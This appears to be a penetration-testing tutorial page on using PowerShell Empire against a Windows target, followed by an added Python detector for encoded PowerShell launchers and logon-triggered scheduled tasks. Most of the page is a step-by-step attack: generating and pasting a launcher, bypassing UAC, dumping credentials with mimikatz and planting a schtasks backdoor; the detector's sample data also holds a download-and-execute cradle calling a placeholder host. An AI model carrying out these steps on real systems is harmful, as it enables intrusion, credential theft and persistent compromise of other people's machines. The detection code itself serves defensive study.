[ Pen Testing Windows ] :: Penetration Testing Windows: Powershell/Empire

Powershell

Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It is not present on all installations of Windows, but can be added via a download from Microsoft.

There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the Run dialog or in cmd.

Before going any further, read this presentation:
https://cdn.shopify.com/s/files/1/0177/9886/files/nmittal.pdf

And see this quick description with handy hints:
https://www.darkoperator.com/blog/2013/1/10/powershell-basicsndashthe-environment.html

Empire

Empire lets you run Powershell agents without needing Powershell to be installed on your target.

Here’s a good intro:
https://ethicalhackingblog.com/hacking-powershell-empire-2-0/

You may need to install Empire:

git clone https://github.com/EmpireProject/Empire.git
cd Empire
chmod +x install.sh
./install.sh

When the installer prompts, enter a password or let it generate one for you.

Create a listener

Start Empire:

./empire
# list listeners
listeners
# use the http listener
uselistener http
execute
# now our listener should show up:
listeners

Create a PowerShell script and send it to your victim using the launcher

Create a launcher:

launcher

Generate a Powershell script with the listener name http:

launcher powershell http

Copy the resulting Powershell script.

Open a new terminal and start a remote desktop session to the target (RDP is noisy, so consider a terminal alternative):

rdesktop -u IEUser -p password 192.168.0.11

In the remote desktop, open a cmd shell and paste in the script. Hit Enter.

Back in the Linux Empire terminal session, see that there is now an agent active.

In the Empire terminal, return to the main menu:

back

List available agents:

agents

Note the Name of the agent. It's random and hard to type, so rename it:

rename [old name] [new name]

Now list the active agents:

list

Interact with our agent (here renamed http):

interact http

Get info on the agent:

info

High_integrity 0 means the agent is not running elevated, so we're not an admin.

Become an admin, amazingly, with a single command, followed by the name of the listener (it spawns a new, elevated agent through that listener):

bypassuac http

Press Enter, then type:

back
list

Note the new agent and the user names listed. An asterisk after the username indicates an elevated (high-integrity) agent. Rename this new agent too:

rename [old name] [new name]

Now let’s interact with the new agent:

interact [agent name]
info

High_integrity 1 now indicates we’re admin!

List all extracted passwords (there aren’t any yet):

creds

Run mimikatz and wait for it to execute. Note that this may crash the LSASS process, making us very conspicuous. See another way to get AD information at https://schoolforhackers.com/penetration-testing-windows-active-directory-extracting-ntds-and-cracking-hashes/.

mimikatz

Once it’s done type:

creds

and see the credentials mimikatz extracted.

Create a persistent backdoor with the module schtasks:

usemodule persistence/elevated/schtasks
# check its options
info
# set
set OnLogon True
set Listener http
# exploit!
execute

Now our backdoor will execute every time the user logs on.
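Seen from the defender's side, the two steps above that touch the target, the pasted launcher one-liner and the schtasks persistence module, leave two artefacts worth alerting on: the process command line and the exported task definition. The following Python is an added example, not Empire's code and not from this page: it decodes -EncodedCommand payloads, scores a command line for launcher-like switches, and audits a task definition for a logon trigger, a highest-privilege run level and a PowerShell action. It assumes the launcher has the common `powershell -noP -sta -w 1 -enc <base64>` shape; the scoring weights and the alert threshold of 4 are arbitrary choices, and every command line, host name and task XML is constructed.

```python
import base64
import xml.etree.ElementTree as ET

# Everything below is constructed for this example. The first command line has the shape of
# the one-liner Empire's "launcher powershell <listener>" step produces
# (powershell -noP -sta -w 1 -enc <base64>); the payload and host are generic placeholders.
STAGER_LIKE = "IEX (New-Object Net.WebClient).DownloadString('http://LISTENER_PLACEHOLDER/launcher')"


def utf16_b64(ps_source):
    """Encode a PowerShell snippet the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(ps_source.encode("utf-16-le")).decode("ascii")


# Constructed process command lines, as a Sysmon Event ID 1 / Security 4688 feed would carry them.
SAMPLE_COMMANDLINES = [
    "powershell -noP -sta -w 1 -enc " + utf16_b64(STAGER_LIKE),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "powershell -EncodedCommand " + utf16_b64("Get-Service | Where-Object Status -eq 'Running'"),
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\IEUser\\notes.txt",
]

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition in the layout `schtasks /query /xml` exports: a logon-triggered,
# elevated task whose action is a hidden, encoded PowerShell command.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NonI -W Hidden -enc """ + utf16_b64(STAGER_LIKE) + """</Arguments>
  </Exec></Actions>
</Task>"""

PAYLOAD_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")


def _flag_present(tokens, full_flag, min_len):
    """PowerShell accepts any unambiguous prefix of a switch, so -nop means -NoProfile."""
    return any(len(t) >= min_len and full_flag.startswith(t) for t in tokens)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None when absent or not valid base64/UTF-16."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) >= 2 and "-encodedcommand".startswith(tok.lower()):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def score_commandline(cmdline):
    """Score a command line for launcher-like traits; returns (score, reasons)."""
    tokens = cmdline.lower().split()
    if not tokens or "powershell" not in tokens[0]:
        return 0, []
    reasons = []
    if _flag_present(tokens, "-noprofile", 4):
        reasons.append("profile suppressed")
    if _flag_present(tokens, "-noninteractive", 5):
        reasons.append("non-interactive")
    if "-sta" in tokens:
        reasons.append("-sta")
    for i, t in enumerate(tokens[:-1]):
        nxt = tokens[i + 1]
        if len(t) >= 2 and "-windowstyle".startswith(t) and (nxt == "1" or "hidden".startswith(nxt)):
            reasons.append("hidden window")
        if (t == "-ep" or (len(t) >= 3 and "-executionpolicy".startswith(t))) and nxt == "bypass":
            reasons.append("execution policy bypass")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        if any(m in decoded.lower() for m in PAYLOAD_MARKERS):
            reasons.append("download/execute cradle in payload")
    weights = {"encoded command": 2, "download/execute cradle in payload": 3}  # assumed weights
    return sum(weights.get(r, 1) for r in reasons), reasons


def flagged_indices(cmdlines, threshold=4):
    """Indices of command lines scoring at or above the (assumed) alert threshold."""
    return [i for i, c in enumerate(cmdlines) if score_commandline(c)[0] >= threshold]


def audit_task_xml(xml_text):
    """Findings for one exported task: trigger, run level, and any launcher-like PowerShell action."""
    root = ET.fromstring(xml_text)
    findings = []
    if root.find("t:Triggers/t:LogonTrigger", TASK_NS) is not None:
        findings.append("runs at logon")
    if root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=TASK_NS) == "HighestAvailable":
        findings.append("requests highest privileges")
    for action in root.findall("t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS)
        arguments = action.findtext("t:Arguments", default="", namespaces=TASK_NS)
        score, reasons = score_commandline(command + " " + arguments)
        if score >= 4:
            findings.append("powershell action: " + ", ".join(reasons))
    return findings


if __name__ == "__main__":
    print(flagged_indices(SAMPLE_COMMANDLINES))  # [0]
    print(audit_task_xml(SAMPLE_TASK_XML))
```

Feed it real command lines from Sysmon Event ID 1 or Security event 4688 (with command-line auditing enabled) and task XML from `schtasks /query /xml`. The legitimate encoded command in the samples scores below the threshold on purpose: encoding alone is common in administration, and it is the combination with a suppressed profile, a hidden window and a download-and-execute payload that marks the launcher. PowerShell Script Block Logging (event 4104) records the decoded content as well, which matters for the RDP step above where the one-liner is typed at an interactive console.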